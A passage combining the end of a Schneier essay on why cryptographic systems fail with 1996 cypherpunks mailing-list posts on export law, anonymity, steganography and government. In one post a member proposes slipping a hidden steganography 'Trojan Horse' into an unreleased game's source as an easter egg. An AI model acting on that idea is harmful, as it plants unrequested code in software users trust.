analysis.  And the disciplines of public-key infrastructure, software
security, computer security, network security, and tamper-resistant
hardware design are very poorly understood.

Companies often get the easy part wrong, and implement insecure algorithms
and protocols.  But even so, practical cryptography is rarely broken
through the mathematics; other parts of systems are much easier to break.
The best protocol ever invented can fall to an easy attack if no one pays
attention to the more complex and subtle implementation issues.  Netscape's
security fell to a bug in the random-number generator.  Flaws can be
anywhere: the threat model, the system design, the software or hardware
implementation, the system management.  Security is a chain, and a single
weak link can break the entire system.  Fatal bugs may be far removed from
the security portion of the software; a design decision that has nothing to
do with security can nonetheless create a security flaw.

Once you find a security flaw, you can fix it.  But finding the flaws in a
product can be incredibly difficult.  Security is different from any other
design requirement, because functionality does not equal quality.  If a
word processor prints successfully, you know that the print function works.
Security is different; just because a safe recognizes the correct
combination does not mean that its contents are secure from a safecracker.
No amount of general beta testing will reveal a security flaw, and there's
no test possible that can prove the absence of flaws.

THREAT MODELS

A good design starts with a threat model: what the system is designed to
protect, from whom, and for how long. The threat model must take the entire
system into account -- not just the data to be protected, but the people
who will use the system and how they will use it.  What motivates the
attackers?  Must attacks be prevented, or can they just be detected?  If
the worst happens and one of the fundamental security assumptions of a
system is broken, what kind of disaster recovery is possible?  The answers
to these questions can't be standardized; they're different for every
system.  Too often, designers don't take the time to build accurate threat
models or analyze the real risks.

Threat models allow both product designers and consumers to determine what
security measures they need.  Does it makes sense to encrypt your hard
drive if you don't put your files in a safe?  How can someone inside the
company defraud the commerce system?  How much would it cost to defeat the
tamper-resistance on the smart card?  You can't design a secure system
unless you understand what it has to be secure against.

SYSTEM DESIGN

Design work is the mainstay of the science of cryptography, and it is very
specialized.  Cryptography blends several areas of mathematics: number
theory, complexity theory, information theory, probability theory, abstract
algebra, and formal analysis, among others.  Few can do the science
properly, and a little knowledge is a dangerous thing: inexperienced
cryptographers almost always design flawed systems.  Good cryptographers
know that nothing substitutes for extensive peer review and years of
analysis.  Quality systems use published and well-understood algorithms and
protocols; using unpublished or unproven elements in a design is risky at
best.

Cryptographic system design is also an art.  A designer must strike a
balance between security and accessibility, anonymity and accountability,
privacy and availability.  Science alone cannot prove security; only
experience, and the intuition born of experience, can help the
cryptographer design secure systems and find flaws in existing designs.

IMPLEMENTATION

There is an enormous difference between a mathematical algorithm and its
concrete implementation in hardware or software.  Cryptographic system
designs are fragile.  Just because a protocol is logically secure doesn't
mean it will stay secure when a designer starts defining message structures
and passing bits around.  Close isn't close enough; these systems must be
implemented exactly, perfectly, or they will fail.  A poorly-designed user
interface can make a hard-drive encryption program completely insecure.  A
false reliance on tamper-resistant hardware can render an electronic
commerce system all but useless.  Since these mistakes aren't apparent in
testing, they end up in finished products.  Many flaws in implementation
cannot be studied in the scientific literature because they are not
technically interesting.  That's why they crop up in product after product.
Under pressure from budgets and deadlines, implementers use bad
random-number generators, don't check properly for error conditions, and
leave secret information in swap files. The only way to learn how to
prevent these flaws is to make and break systems, again and again.

CRYPTOGRAPHY FOR PEOPLE

In the end, many security systems are broken by the people who use them.
Most fraud against commerce systems is perpetrated by insiders.  Honest
users cause problems because they usually don't care about security.  They
want simplicity, convenience, and compatibility with existing (insecure)
systems.  They choose bad passwords, write them down, give friends and
relatives their private keys, leave computers logged in, and so on.  It's
hard to sell door locks to people who don't want to be bothered with keys.
A well-designed system must take people into account.

Often the hardest part of cryptography is getting people to use it.  It's
hard to convince consumers that their financial privacy is important when
they are willing to leave a detailed purchase record in exchange for one
thousandth of a free trip to Hawaii.  It's hard to build a system that
provides strong authentication on top of systems that can be penetrated by
knowing someone's mother's maiden name.  Security is routinely bypassed by
store clerks, senior executives, and anyone else who just needs to get the
job done.  Only when cryptography is designed with careful consideration of
users' needs and then smoothly integrated, can it protect their systems,
resources, and data.

THE STATE OF SECURITY

Right now, users have no good way of comparing secure systems.  Computer
magazines compare security products by listing their features, not by
evaluating their security.  Marketing literature makes claims that are just
not true; a competing product that is more secure and more expensive will
only fare worse in the market.  People rely on the government to look out
for their safety and security in areas where they lack the knowledge to
make evaluations -- food packaging, aviation, medicine.  But for
cryptography, the U.S. government is doing just the opposite.

When an airplane crashes, there are inquiries, analyses, and reports.
Information is widely disseminated, and everyone learns from the failure.
You can read a complete record of airline accidents from the beginning of
commercial aviation.  When a bank's electronic commerce system is breached
and defrauded, it's usually covered up.  If it does make the newspapers,
details are omitted.  No one analyzes the attack; no one learns from the
mistake.  The bank tries to patch things in secret, hoping that the public
won't lose confidence in a system that deserves no confidence.  In the long
run, secrecy paves the way for more serious breaches.

Laws are no substitute for engineering.  The U.S. cellular phone industry
has lobbied for protective laws, instead of spending the money to fix what
should have been designed corectly the first time.  It's no longer good
enough to install security patches in response to attacks.  Computer
systems move too quickly; a security flaw can be described on the Internet
and exploited by thousands.  Today's systems must anticipate future
attacks.  Any comprehensive system -- whether for authenticated
communications, secure data storage, or electronic commerce -- is likely to
remain in use for five years or more.  It must be able to withstand the
future:  smarter attackers, more computational power, and greater
incentives to subvert a widespread system.  There won't be time to upgrade
them in the field.

History has taught us:  never underestimate the amount of money, time, and
effort someone will expend to thwart a security system.  It's always better
to assume the worst.  Assume your adversaries are better than they are.
Assume science and technology will soon be able to do things they cannot
yet.  Give yourself a margin for error.  Give yourself more security than
you need today.  When the unexpected happens, you'll be glad you did.

******************************************************************************
Bruce Schneier       schneier@counterpane.com       http://www.counterpane.com
******************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 11 Nov 1996 16:51:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Federal Reserve Bank is ILLEGAL? [BOB DYLAN]
In-Reply-To: <199611112318.SAA19657@beast.brainlink.com>
Message-ID: <Pine.GUL.3.95.961111155838.5269A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 11 Nov 1996, Doug Renner wrote:

> http://feustel.mixi.net/GOV/DEPTS/fedres.html
> 
> Most list members would be very interested in the above link.

Indeed. It's hilarious, especially the References section. Thanks!

I think maybe you should take a look at the Noontide Press catalog.

- -rich

ObCopyrightViolation (not really on-topic, because Carto and Pierce were
kicked out of the Birch Society, but it's funnier than, for example,
<http://www.c2.net/~rich/nab9608-1.gif>):

TALKIN' JOHN BIRCH PARANOID BLUES
(Words and Music by Bob Dylan)
1970, 1973 Special Rider Music

Well, I was feelin' sad and feelin' blue,
I didn't know what in the world I was gonna do,
Them Communists they wus comin' around,
They wus in the air,
They wus on the ground.
They wouldn't gimme no peace. . .

So I run down most hurriedly
And joined up with the John Birch Society,
I got me a secret membership card
And started off a-walkin' down the road.
Yee-hoo, I'm a real John Bircher now!
Look out you Commies!

Now we all agree with Hitlers' views,
Although he killed six million Jews.
It don't matter too much that he was a Fascist,
At least you can't say he was a Communist!
That's to say like if you got a cold you take a shot of malaria.

Well, I wus lookin' everywhere for them gol-darned Reds.
I got up in the mornin' 'n' looked under my bed,
Looked in the sink, behind the door,
Looked in the glove compartment of my car.
Couldn't find 'em . . .

I wus lookin' high an' low for them Reds everywhere,
I wus lookin' in the sink an' underneath the chair.
I looked way up my chimney hole,
I even looked deep inside my toilet bowl.
They got away . . .

Well, I wus sittin' home alone an' started to sweat,
Figured they wus in my T.V. set.
Peeked behind the picture frame,
Got a shock from my feet, hittin' right up in the brain.
Them Reds caused it!
I know they did . . . them hard-core ones.

Well, I quit my job so I could work alone,
Then I changed my name to Sherlock Holmes.
Followed some clues from my detective bag
And discovered they wus red stripes on the American flag!
That ol' Betty Ross . . .

Well, I investigated all the books in the library,
Ninety percent of 'em gotta be burned away.
I investigated all the people that I knowed,
Ninety-eight percent of them gotta go.
The other two percent are fellow Birchers . . . just like me.

Now Eisenhower, he's a Russian spy,
Lincoln, Jefferson and that Roosevelt guy.
To my knowledge there's just one man
That's really a true American:  George Lincoln Rockwell.
I know for a fact he hates Commies cus he picketed the movie Exodus.

Well, I fin'ly started thinkin' straight
When I run outa things to investigate.
Couldn't imagine doin' anything else,
So now I'm sittin' home investigatin' myself!
Hope I don't find out anything . . . hmm, great God!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMofAP5NcNyVVy0jxAQEWUwH/VBpVAQeLio6vvqk4+Wku+y2zSETIqat8
KQso3BxkgV8mC3wiD7oC4YdJTnGIFnh5Zutt6po0wF/URkpda7zBcA==
=r6Fl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Sun, 10 Nov 1996 23:10:16 -0800 (PST)
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0b36.32.19961111155455.006d2174@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>PLEASE TAKE ME OFF YOUR MAILING
>LIST!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

I'm sorry Jayme, but you didn't include the requisite number of !'s, so we
cannot process your request.
Mark Neely - accessnt@ozemail.com.au
Lawyer, Internet Consultant, Professional Cynic & Author
BizWeb: For Serious Intrepreneurs - www.maximedia.com.au/bizweb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Mon, 11 Nov 1996 16:56:27 -0800 (PST)
To: gt@kdn0.attnet.or.jp
Subject: Re: RSA and me...
Message-ID: <3.0b36.32.19961111164959.0114bcc4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:14 AM 11/10/96 GMT, Gemini Thunder wrote:
>'Lo.
>Is the "RSA in 3 lines of Perl" a munition (under ITAR)?
>What if I got it as a tatoo?  

Its been done.  (Someone got it a year or so back...)  

What was funny about it was that i remarked (in jest) "what if the tattoo
artist made a typo?  Would it still be illegal?".  Seems the tatto artist
*HAD* made a typo and had to go back and fix it.

I think that the person with the tattoo would be thrown in the LaBrea ITAR
pits just to be safe...

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 11 Nov 1996 17:03:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rush disses anonymity
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <3287CCBD.7C2E@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:
> 
> I'm sitting here listening to Rush, and he's talking about Pierre
> Salanger's recent "discovery" ;-) of the anonymously posted 
> friendly-fire TWA800 internet message of a few months back.

I must say I was pleased (and, I'm sorry to say, surprised) not to hear 
people talking about that "conspiracy" on this list. I gave a friend at 
the Merc hell for publishing a story saying that maybe there was 
something to it because there was some web site with "details of 
possible trajectories and everything." Morons.

> In the process of discounting the story, and praising FBI pal 
> Kalstrom, he bemoans the anonymity of the net, calling it a "nest of 
> kooks", (mixed in with all the other "right thinking people", of
> course...).
> 
> Given this, and, of course, our own fun and games with anonymous, er,
> slander, on this list, I'm frequently tempted to agree with him.

You people are wimps. The only real effect of the good doctor's rants 
has been, as Mr. May indicated, to get the good doctor on the "don't 
hire" list.

> After all,
> if someone says something wrong about you, how do find them and punish
> them? How do you know what the truth is, unless you know who said it?

You get off your ass and find out directly.

How about if you know exactly who it is, but you know him to be 
judgement-proof, since he's already saddled with over $12 million in 
libel and wrongful-death suits? It's called "reputation capital."

> Until, of course, I remember that anonymity is unpreventable, and,
> frankly, economically necessary for true internet commerce.
> 
> Remember what agrarianism did to try to stop industrialism (up to, and
> including, socialism <he said, trolling for leftists>), and expect the
> worst, folks.

People are just going to have to be smarter than they've ever been. The 
Net enables sharing and verifying real information just as it enables 
disinformation. Sure disinformation will always be cheaper to produce 
and more appealing to the eye (fact is harder to accept than fiction 
because fictional plots are written to make sense), but disinformation 
tends to cancel itself out.

Work on archives, reputation control, and openness. Disinformation, to 
be truly effective, requires a monopoly on information. More speech, not 
less.

(Keep in reserve the retort that anonymity is quite big in "the 
mainstream," too. How many key stories cite "well-placed 
administration sources"?)

The opposite of the Black Unicorn approach to nym safety is the Liz 
Taylor approach: "As long as they spell my name right, I don't care."
Nobody I care about is going to listen to some crank, or if they do, 
they'll email me to check the facts, or if they don't, I have 
alternative outlets for information. As long as I live in a free country 
with a free Internet, they can't touch me.

Oh, btw, it's helped that I've resigned myself to forever working for 
decent people who don't give in to such bullshit.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 11 Nov 1996 17:21:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Universal Service for the Net: Why it's a bad idea
In-Reply-To: <9611082306.AA24281@su1.in.net>
Message-ID: <3287D0ED.6FDB@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Frank Willoughby wrote:
> 
> At 07:53 AM 11/8/96 -0800, Declan McCullagh <declan@well.com> wrote:
> >* Why should a Beverly Hills high school get a discount of 20
> >  percent? Can't they afford to pay for ISDN?
> 
> Depends on how their telco's tariffs are set up.  Here in Indiana,
> we have a monopoly called "Ameritech" who, out of the kindness of
> their hearts, charges ***per-minute*** ISDN rates.

Huh? Here on Planet Earth, that's the way it is everywhere, except 
"non-prime-time" or Centrex rates may be special. In most of the world, 
local analog voice calls are metered. The US is the exception.

> Expect costs of over $600/month for a permament connection (one
> line) to the Internet.

Now, that *would* be unusual. Unless you mean a full-time dedicated port 
with a dedicated IP address, which I don't think schools need (their web 
server should be co-located at their ISP anyway). Dialup ISDN is much 
cheaper. We've got it down to about $75/month/user, all included.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Mon, 11 Nov 1996 09:40:03 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: two bogus messages to this list
In-Reply-To: <199611111238.GAA17346@manifold.algebra.com>
Message-ID: <199611111740.KAA06336@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611111238.GAA17346@manifold.algebra.com>, on 11/11/96 
   at 06:38 AM, ichudov@algebra.com (Igor Chudov @ home) said:

-.I did not write the two messages below. I did have a small party
-.yesterday, probably some of my guests did that...

        just goes to proof it:  Microslop and Intel boxes are secure
    only when most of their parts are stored under lock and key.

--
    Cyberspace and Information are Freedom.  
        FUCK your WIPO, too. 
                -attila





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 17:44:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611120144.RAA16388@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 12:58 AM 11/8/1996, stewarts@ix.netcom.com wrote:

>> Strong vs. weak crypto isn't the real issue - for most business use,
>> weak crypto is obviously unacceptable, but strong crypto with GAK
>> is ok as long as it doesn't interfere with use (and as long as the
>> government bureaucrats don't sell too many keys.)

To which, at 09:02 AM 11/8/96 -0800, Peter Hendrickson wrote:

>We often say that the government is a security weak point and that
>this makes GAK impractical.  However, this is not true.  If the
>holders of the government keys were individually responsible for
>their release, they would not be released very often.  That is,
>in order to use cryptography you must purchase an expensive
>encryption license.  That pays the salary of a certified "key
>escrow agent" who is the only person who can decrypt your messages.
>What stops him from revealing your keys to unauthorized parties?
>It's his business.  If that's not enough, you back it up with
>criminal penalties for disclosure.  And, hiring this person is
>no different from hiring an employee for your company.
>
>There are already similar activities.  Lawyers are nominally employees
>of the state.  Employees of Swiss banks can go to jail for violating
>their secrecy laws.

Then there is the meat-packing inspectors, I don't know if this should give
piece of mind or instill new fear.  The inspectors were put in there because
the meat was rancid, the thing is, some of it still is if you listen to the
critics.
A partial fix at least.

>At 12:58 AM 11/8/1996, stewarts@ix.netcom.com wrote:

>> The government might be able to stop new Netscape versions from
>> using strong crypto - threatening to confiscate the company's
>> ill-gotten gains from aiding and abetting money launderers might help,
>> and threatening to confiscate PCs that use unapproved crypto.
>> But it's tough to use a widespread threat like that on popular
>> software once it's out there.

To which, at 09:02 AM 11/8/96 -0800, Peter Hendrickson wrote:

>I agree, if the software is popular.  But, if the fears of the GAKers
>and the dreams of certain cypherpunks are real, such software will
>not be popular.

Another point is, if the government attacks Netscape for their strong
crypto(which is pretty hard to get, I'm in Oklahoma and I couldn't get it
because some server didn't know for sure that my server was in the United
States or Canada), someone will probabally make an in-line plug-in for
encrypted data, and this plug-in may affect more of the browser than the
existing system, making it more dangerous to the governments schemes.
Anyone know where the data is stored on how to write for Netscape?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 17:44:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611120144.RAA16395@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:02 AM 11/8/96 -0800, Peter Hendrickson wrote:
>At 12:29 AM 11/8/1996, Jim McCoy wrote:
>>Peter Hendrickson writes:
>>[...]
>>>> Get a warrant, search my system, find nothing but a bunch of applications
>>>> and a collection of risque (but definitely legal) pictures which I exchange
>>>> with a few friends.  You may suspect that when the images are concatenated
>>>> in a particular way the low-order bits form a stego filesystem but no one
>>>> will be able to prove it in court.
>
>>> Are you concatenating these images by hand?  If so, the level of entropy
>>> is probably low enough to recover the information through brute force
>>> methods or you are hiding a very small amount of information.
>
>> I hide the relatively small amount of data within a very large amount of
>> data which makes it impossible to find.  Data from analog sources, like
>> the "real world" (images, sounds, etc) is noisy.  This is a fact of life.
>> Because this data is noisy I can hide information in the noise.  As long
>> as the information I am hiding maintains the same statistical properties
>> of noise it is impossible to pull the information out of the data file unless
>> you have the key.  If I am paranoid enough I can make this key impossible
>> to discover without a breakthrough in factoring.
>
>Where will you keep your secret key?  Remember, when they go through your
>house they bring 20 young graduates from MIT who are just dying to show
>how clever they are and save the world at the same time.
>
>> This is the essence of steganography and the nature of signal and noise are
>> fundemental principles of information theory.
>
>The concept of noise is not all that well defined, however.  There is no
>way to look at a signal and say "this is all noise."  Sometimes physical
>theories may lead you to believe that it is all noise.  That is fine
>for many applications, but when becomes less convinced of things if
>the consequences are severe.
>
>>> If you are not doing it by hand, you own terrorist software and will pay
>>> the price.
>
>> Ah yes, terrorist programs like cat and perl and operating systems like
>> Linux which contain a loopback filesystem that I can hook a perl
>> interpreter into at compile-time (which is enough for me to rewrite the
>> program from scratch each time if necessary, unless things like math
>> libraries are also outlawed on computers :)  I think that the crypto
>> concentration camps are going to be very crowded places.
>
>Can you elaborate on this?  I am curious to know exactly what you are going
>to keep in your head and what goes on the disk.  Please post the Perl
>code that you would type in from scratch every time.

(Most of the message left for clarity)
I would type dungeon at the prompt and Ctrl-Alt-6 at the first door.
But that's just me.
BTW.  The hypothetical Steno program (Trojan Horse) that I wrote about
earlier (and that this refers) could have its own source hidden in the
opening screen of both the game and the bmp that I would use for my windows
background.  If anyone has access to the source of a soon to be released
game, they could add this to it as an easter egg, thus, the author would be
spreading a very powerful tool which would be advertized several months
after it was released.  If it were added to a program with references to
cypherpunks or similar, it might even reach the (primary) target audience.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 17:46:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Exon Countdown Clock and farewell messages
Message-ID: <199611120144.RAA16399@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:59 AM 11/8/96 -0800, Michael Page wrote and Rich Graves forwarded:
...
>We would attempt to send it via a Email, but the respected Senator does not
>have Email. (The Irony).
...
There is no irony here, Mr. Exon tried to control the internet for the very
reason that he didn't understand it and one of his granddaughters did.
Perhaps if he did understand the internet then he wouldn't be a threat.
Remember, people fear that which they don't understand.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Mon, 11 Nov 1996 09:54:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Movement Tracking Systems and Smartcards
Message-ID: <9611111754.AA19234@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




Date: Sat, 9 Nov 1996 11:23:29 -0800
From: "Timothy C. May" <tcmay@got.net>
Subject: Movement Tracking Systems and Smartcards

> helping to solve crimes. I expect the Big Three of credit-reporting
> agencies are of course also in the loop....those movies where someone is
> located because they foolishly used an ATM machine to get some cash or used
> their credit card are not just fiction.)


Exactly.  I was interviewed over a terrorist double-murder in 1993
because of having used an ATM near the scene the same day.
The fact that I did so AFTER the explosions by which time
the terrorists would presumably be far away cut no ice.
Nobody has been arrested for this AFAIK.

They wanted to know which shops I'd bought what in
so they could check said items were sold that day I suppose.

As it seems nothing can be taken as read in some minds let
me state I had nothing to do with that or other terrorist crimes.




 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.) (by way of "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>)
Date: Mon, 11 Nov 1996 15:02:00 -0800 (PST)
To: Chung@w3.org
Subject: Computer hacker tries to hire rapist: Police
Message-ID: <3.0.32.19961111175002.00a19170@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I'm sure many people will be pleased with the term "computer hacker" to
describe someone with an AOL account getting stung...(those insidious
hackers will stop at nothing...)

  	  				 
	 BOSTON (Reuter) - A Vermont man who used a computer online  
service to try to hire someone to rape and sexually mutilate his 
wife unknowingly employed a policeman for the job, the 
Massashusetts Attorney General's office said Thursday. 
	 Harold Clarkson, 50, was charged with two counts of hiring  
someone to commit kidnapping and sexual assault. He faces a 
maximum of 10 years in prison, police said. 
	 Clarkson, identifying himself on the America Online service  
as ``Trudy21'', a 21-year-old woman from North Carolina, said he 
wanted to hire someone to kipnap his sister, beat her with a 
baseball bat, rape her with a champagne bottle and commit other 
acts, a spokesman for Attorney General Scott Harshbarger said. 
	 Massachusetts State Police Lt. Andrew Palombo, who works for  
the Attorney General's Office and routinely investigates on-line 
services, was also logged onto America Online while off-duty. 
	 Palombo contacted America Online and discovered 'Trudy21'  
was Clarkson and the victim was his wife, police said. 
	 Palombo then posed as a woman on the online service and  
contacted Clarkson, who described a variety of sexual torture 
practices that he would like to perform on a woman, said Robert 
Sikellis, the Massachusetts attorney general's chief of special 
investigations. 
	 Palombo arranged for a woman undercover police officer to  
meet Clarkson in Rutland, Vermont, where he showed up with 
handcuffs, rope, a blindfold and other devices and was arrested Wednesday, 
he said.
  	   	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Mon, 11 Nov 1996 15:28:14 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: How many people killed by there own governments (Was: Re: a retort + a comment + a question = [RANT])
Message-ID: <3.0.32.19961111182528.00a31d70@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>With regard to b), governments--primarily through the use of 
>their militaries--have killed, by some counts 170,000,000, men,
>women and children in this century alone.  Hardly the guardians
>of freedom, in my opinion.

	Do you have a breakdown of that number? I'm working on one of my thought
experiments and am looking for the appropriate stats:


o THUGS V. GOVS 
  (during times of "modern" govts. 1800+)

Deaths by Govts. on "own people"

  US Civil War     x M
  US Native Americans
  Hitler: Jews     6 M
  Hitler: Others   6 M
  Stalin:         30 M
  China: Cult Rev  x M
  France: Rev      x M


  Deaths by Thugs

  Murders in whole world

	^^^ See to be valid, I think I'd have to including thugs all over the
world (since I use genocides all over the world) but if I had the
death/person US figure, I could multiply that by the whole world and have a
upper bound (conservative) since US has a partcularly large amount of murderes.
_______________________
Regards,          In every man's heart there is a secret nerve that answers 
                  to the vibrations of beauty. -Christopher Morley
Joseph Reagle     http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 11 Nov 1996 16:44:03 -0800 (PST)
To: attila@primenet.com
Subject: Re: two bogus messages to this list
In-Reply-To: <199611111740.KAA06336@infowest.com>
Message-ID: <Pine.BSF.3.91.961111182838.3985C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 11 Nov 1996 attila@primenet.com wrote:

> In <199611111238.GAA17346@manifold.algebra.com>, on 11/11/96 
>    at 06:38 AM, ichudov@algebra.com (Igor Chudov @ home) said:
> 
> -.I did not write the two messages below. I did have a small party
> -.yesterday, probably some of my guests did that...
> 
>         just goes to proof it:  Microslop and Intel boxes are secure
>     only when most of their parts are stored under lock and key.
> 


Um, not to disagree with you re Intel/Micro$loth, but most UNIX systems 
can be brought up in single-user mode and the root password changed by 
anyone with physical access to the system. You could end up with even 
more trouble than if someone messed with your M$ box.

-r.w.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Mon, 11 Nov 1996 18:42:52 -0800 (PST)
To: Gemini Thunder <gt@kdn0.attnet.or.jp>
Subject: Re: RSA and me...
Message-ID: <1.5.4.32.19961112024051.003c9d70@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Sun, 10 Nov 1996, Gemini Thunder wrote:
>> 'Lo.
>> Is the "RSA in 3 lines of Perl" a munition (under ITAR)?
>> What if I got it as a tatoo?  

Lucky replied
>Somebody did this. Check the RSA in perl homepage.

Furthermore, you'd be wasting pain, time, and money.
Perl5 makes it possible to do RSA in two lines of Perl :-)
And that'd leave room on your arm for the 3-line RC4!

If you want to leave the country with it, you might need
to register as an, um, international arms dealer...

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Nov 1996 18:55:32 -0800 (PST)
To: "Joseph M. Reagle Jr." <sandfort@crl.com>
Subject: Re: How many people killed by there own governments (Was: Re: a  retort + a comment + a question = [RANT])
Message-ID: <199611120255.SAA08586@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:27 PM 11/11/96 -0500, Joseph M. Reagle Jr. wrote:
>>With regard to b), governments--primarily through the use of 
>>their militaries--have killed, by some counts 170,000,000, men,
>>women and children in this century alone.  Hardly the guardians
>>of freedom, in my opinion.
>
>	Do you have a breakdown of that number? I'm working on one of my thought
>experiments and am looking for the appropriate stats:
>
>
>o THUGS V. GOVS 
>  (during times of "modern" govts. 1800+)
>
>Deaths by Govts. on "own people"
>
>  US Civil War     x M
>  US Native Americans
>  Hitler: Jews     6 M
>  Hitler: Others   6 M
>  Stalin:         30 M
>  China: Cult Rev  x M
>  France: Rev      x M

Don't forget that the likely cause of the 1917 world-wide influenza pandemic 
was probably caused or greatly increased in seriousness by the WWI movement 
of soldiers, and the conditions at the front.    Had there been no war, 
there might still have been a very localized outbreak, but it would have 
been much less serious.

The estimate of 170 million seems a bit high, but not by much.  



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ratak (Jason E.J. Manaigre) <ratak@escape.ca>
Date: Mon, 11 Nov 1996 17:16:11 -0800 (PST)
To: dc-stuff@dis.org
Subject: FY 1997 classified programs list now available.
Message-ID: <199611120118.TAA14817@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: dc-stuff@dis.org
Date: Mon Nov 11 19:16:08 1996

People! I got this message today, and the web site :

http://www.frogi.org/classified-programs.html

It has all the details, take a close look at what the U.S Goverment has been 
up to in regards to there classified programs branchs...


God damn do they ever spend money...!

All research done by::

Paul McGinnis / PaulMcG@aol.com
  http://www.frogi.org/secrecy.html  [military secrecy site]




- -----Begin Included Message ----- 

Date: Mon, 11 Nov 1996 18:44:14 -0500
 From: PaulMcG@aol.com
To: skunk-works@mail.orst.edu, area51@lists.best.com
Cc: 

I have posted my new, extensive list of classified military programs (and 
the references I used to find them) in the FY 1997 budget at:

  http://www.frogi.org/classified-programs.html

(NOTE: requires a Web browser with table support)

There are some shocking revelations such as 31% of the Air Force's research
and development budget is being spent on programs whose purpose -and- cost 
is classified. Doesn't anyone believe in public accountability for taxpayer
money?
___________________________________________________________________
GarGoyle Securities
- -Intrusion Assessment Systems
- -Security Consultation/Education/Curriculum Development
- -Project Management/Research/Analysis World Wide...
- -Member of CITDC (Canadian International Trade Development Council)
- -Email: ratak@GargSec.mb.ca (Jason E.J. Manaigre)
- -Web: www.GargSec.mb.ca
- -Email for PGP key with phrase 'Get Public Key' as Subject
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMofP4PqtmO8M92GRAQGrKQgAtmH+2O5k8AODrjR1qvBoR6Q37AqWJ6Rg
